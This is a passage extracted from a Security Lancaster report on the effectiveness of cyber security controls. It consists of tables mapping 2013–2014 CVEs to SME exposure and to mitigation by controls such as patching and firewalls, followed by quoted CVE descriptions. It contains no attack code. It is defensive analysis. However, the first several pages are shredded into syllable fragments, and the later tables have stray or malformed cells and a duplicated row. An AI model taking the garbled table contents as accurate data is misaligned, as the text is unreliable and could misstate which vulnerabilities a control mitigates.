itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-01

72

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-U

ser

Acc

ess

(Str

on

gP

assw

ord

)P

atch

Man

agem

ent

CV

E-2

01

3-0

17

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-01

99

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-02

53

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Ser

ver)

CV

E-2

01

3-0

27

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

48

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

59

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

61

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

63

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-0

64

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Pat

chM

anag

emen

tC

VE

-20

13

-07

46

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-07

53

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-07

87

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

90

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

03

5y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-1

10

2n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-11

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-1

14

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

15

3y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

18

1n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-13

03

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-13

84

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

CV

E-2

01

3-1

38

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

45

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-1

47

2y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Acc

ess

Po

licy)

CV

E-2

01

3-1

55

3y

ny

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

62

0y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

62

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

63

8y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

66

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

67

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

70

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

13

-17

34

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-17

77

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-23

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

C

VE

-20

13

-23

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-2

35

0n

yn

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-2

49

2y

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-25

07

yn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Fir

mw

are

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

3-2

73

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-2

78

0n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-28

03

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

Pat

chM

anag

emen

tsC

VE

-20

13

-28

24

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-2

82

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-29

20

ny

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-30

64

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

16

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

37

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eS

ecu

reC

on

fig

ura

tio

n(D

on

rsquotIn

stal

l)C

VE

-20

13

-31

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

99

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

01

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

06

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

80

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-3

38

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-34

17

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-3

63

2y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

CV

E-2

01

3-3

65

6n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

85

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

An

ti-M

alw

are

CV

E-2

01

3-3

86

0y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Management

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, AntiDOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.01 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

